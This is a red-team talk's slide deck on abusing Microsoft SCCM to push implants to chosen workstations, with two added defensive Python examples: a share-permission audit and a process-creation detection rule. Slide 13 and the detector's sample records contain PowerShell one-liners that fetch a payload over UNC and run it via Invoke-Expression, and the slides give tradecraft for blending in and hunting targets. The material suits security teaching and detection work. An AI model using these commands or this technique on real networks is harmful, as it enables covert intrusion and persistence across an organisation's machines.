Red team upgrades using sccm for malware deployment
Matt Nelson - Veris Group's Adaptive Threat Division
1. Red Team Upgrades: Using SCCM for Malware Deployment
2. @enigma0x3
   ❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group
   ❖ Active developer on the PowerShell Empire project
   ❖ Offensive PowerShell advocate
   ❖ 2nd time speaking!
   ❖ This con is probably older than I am
   ❖ Indiana corn farmer turned h4x0r (not really)
3. What this is...
   ❖ What is SCCM and how some admins fail at securing it
   ❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.
   ➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
4. Setting the Stage
   ❖ This talk assumes you have RDP access to a SCCM server
   ❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not on obtaining access to SCCM.
   ❖ No, having access to SCCM does not mean you own the enterprise
   ❖ If you administer SCCM as a domain admin, you fail.
5. What is SCCM?
   ❖ Platform for distributing packages/applications to clients
   ❖ Packages, applications and install scripts are hosted on the SCCM server
   ❖ Set up and maintained via an agent/server architecture
   ❖ Consists of a central site server with distribution points.
   ➢ Agents check in to the server periodically to obtain new packages/applications
   ❖ Basically acts as an internal RAT/C2
6. SCCM in the enterprise
   ❖ 1 central site server with multiple distribution points
   ❖ Typically managed via controlled groups
   ➢ e.g. “SCCM Admins” in AD
   ❖ Typically set up/configured using a service account to run the application/push updates
   ❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share
   ❖ Admins gonna admin
7. Right Click Tools
   ❖ Add-on that can be installed to assist in client management tasks
   ❖ Should be installed on a client such as an administrative workstation...not on the server
   ➢ Admins install it on the server anyway
   ❖ Enables full control of managed endpoints
8. Yep...
9. Why use SCCM in Red Teaming?
   ❖ Manages a ton of distributed clients
   ➢ Take control of the server and you have distributed workstation control
   ➢ SCCM agents are just waiting to run your code
   ❖ Live off the land
   ➢ Keep your malicious implant count low, use SCCM for very targeted implant distribution
   ➢ Looks like normal day-to-day traffic/activity
   ➢ To limit the risk of getting caught, become an admin and not a typical adversary
10. Why use SCCM in Red Teaming? (cont)
   ❖ Allows you to identify and strategically group targets
   ➢ Able to push implants out in a very controlled and surgical manner
   ❖ Also acts as a persistence mechanism
11. Abusing SCCM: Hunting
   ❖ Some organizations have user->device mapping
   ➢ This allows admins to create specific groups for departments
   ❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
12. Abusing SCCM: Compromise
   ❖ Create an application/package that utilizes PowerShell for payload delivery and execution
   ❖ Do so by creating a PowerShell payload and throwing it up on the public share SCCM uses (typically something like sccmsource)
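Slides 6 and 12 both hinge on the package source share being reachable, and in the worst case writable, by more than the SCCM service account and its admins. The following added example (not from the deck, and not Microsoft tooling) is a defender's audit: it parses icacls-style output for a package source share and flags ACEs that grant write or modify rights to broad principals such as Everyone, Authenticated Users or Domain Users. The share name `sccmsource` comes from the slide; the server name, accounts and permission lines are constructed for the demo, and the set of "broad" principals and write-capable icacls codes are this example's own choices.

```python
import re

# Constructed icacls-style output for a hypothetical SCCM package source
# share (\\sccm01\sccmsource). Invented for this example, not real output.
SAMPLE_ICACLS = r"""
\\sccm01\sccmsource BUILTIN\Administrators:(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                    CORP\svc_sccm:(OI)(CI)(M)
                    CORP\Domain Users:(OI)(CI)(RX,W)
                    Everyone:(OI)(CI)(RX)
\\sccm01\sccmsource\Apps CORP\SCCM Admins:(OI)(CI)(M)
                         Authenticated Users:(OI)(CI)(M)
"""

# Principals that amount to "every domain user" (assumption for this demo).
BROAD_PRINCIPALS = {"everyone", "authenticated users", "users", "domain users"}
# icacls rights that allow changing content: simple (F, M, W) plus the
# generic/specific codes that include write access.
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "WEA", "WDAC", "WO", "DC"}
# Inheritance flags that appear in the same parentheses but are not rights.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
PATH_START = re.compile(r"^(?:[A-Za-z]:\\|\\\\)\S*")


def parse_icacls(text):
    """Yield (path, principal, rights) for each ACE line.

    Only unindented lines start with a path; indented continuation lines
    inherit the path of the previous one. Paths containing spaces are not
    handled, to keep the parser short.
    """
    current_path = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PATH_START.match(raw)
        if m:
            current_path = m.group(0)
            line = raw[m.end():].strip()
        # Rights are after the last colon; the principal is everything before.
        left, _, rights = line.rpartition(":")
        codes = set()
        for group in re.findall(r"\(([^)]*)\)", rights):
            codes.update(c.strip() for c in group.split(","))
        yield current_path, left.strip(), codes - INHERIT_FLAGS


def normalize(principal):
    """Lower-case and drop a DOMAIN\\ or NT AUTHORITY\\ prefix for comparison."""
    p = principal.lower()
    return p.split("\\", 1)[-1] if "\\" in p else p


def writable_by_broad_groups(text):
    """Return [(path, principal, sorted rights)] where a broad group can write."""
    findings = []
    for path, principal, rights in parse_icacls(text):
        if normalize(principal) in BROAD_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((path, principal, sorted(rights)))
    return findings


if __name__ == "__main__":
    for path, who, rights in writable_by_broad_groups(SAMPLE_ICACLS):
        print(f"{path}: {who} can modify content ({','.join(rights)})")
```

Run against real output (`icacls \\server\share /t`) the same function lists every folder under the package source where a non-admin group could replace an install script before the client agents pull it; the expected result on a correctly configured share is an empty list.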
13. Abusing SCCM: Compromise
   ❖ Create a script installer application to fetch and execute your payload
   ➢ cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""
   ❖ Deploy the application to your target group and wait for the SCCM agents to check in
   ➢ Payload is fetched over UNC and runs in memory
   ❖ More here:
   ➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
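From the blue side, the deployment on slide 13 leaves a distinctive process-creation record: the SCCM client host launches a PowerShell that reads a text file over UNC and pipes it into Invoke-Expression. The following added example (not from the deck) is a small detection run over constructed Sysmon Event ID 1 / Windows 4688-style records reduced to four fields. It keys on exactly that combination rather than on PowerShell or UNC access alone, since ordinary installers do both. CcmExec.exe is the SCCM client host process; the hosts, share, file names and the benign records are invented for the demo.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 / 4688 style),
# invented for this example. Two are benign, two follow the slide 13 pattern.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "parent": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "powershell.exe -c "gc \\sccm01\sccmsource\Apps\payload.txt | iex""'},
    {"host": "WS-FIN-07", "parent": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "\\sccm01\sccmsource\Apps\7zip\7z.msi" /qn'},
    {"host": "WS-HR-03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "WS-HR-03", "parent": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "cat \\sccm01\sccmsource\Apps\stage.txt | Invoke-Expression"'},
]

# A content read (gc/cat/type/Get-Content) whose first argument is a UNC path.
UNC_READ = re.compile(r"\b(?:gc|cat|type|get-content)\s+(?:-path\s+)?['\"]?\\\\[^\s'\"]+", re.I)
# Anything that evaluates a string as code.
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# The SCCM client host process (assumed parent for agent-driven installs).
SCCM_CLIENT = "ccmexec.exe"


def analyze(event):
    """Classify one record; returns host, severity and the matched indicators."""
    cmd = event["cmdline"]
    flags = []
    if POWERSHELL.search(cmd):
        flags.append("powershell")
    if UNC_READ.search(cmd):
        flags.append("unc_script_read")
    if IEX.search(cmd):
        flags.append("invoke_expression")
    if event["parent"].rsplit("\\", 1)[-1].lower() == SCCM_CLIENT:
        flags.append("sccm_client_parent")

    # Reading a file over UNC *and* evaluating it is the pattern itself.
    # Invoke-Expression on its own is only worth a medium; UNC reads alone
    # are routine for installers and are not alerted on.
    if "unc_script_read" in flags and "invoke_expression" in flags:
        severity = "high"
    elif "invoke_expression" in flags:
        severity = "medium"
    else:
        severity = "none"
    return {"host": event["host"], "severity": severity, "flags": flags}


def scan(events):
    """Return alerts (severity above none) in input order."""
    return [a for a in map(analyze, events) if a["severity"] != "none"]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The `sccm_client_parent` flag is kept separate from severity on purpose: an alert carrying it points the responder at the SCCM console (which application, which collection, who created it) rather than at the workstation, which is where the deck's technique is actually rooted.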
14. Questions and Contact
   ❖ Feel free to hit me up!
   ❖ enigma0x3 [at] gmail [dot] com
   ❖ @enigma0x3 on Twitter and Github
   ❖ enigma0x3 on Freenode: #psempire
   ❖ Blog: enigma0x3.wordpress.com
15. References
   ❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
   ❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/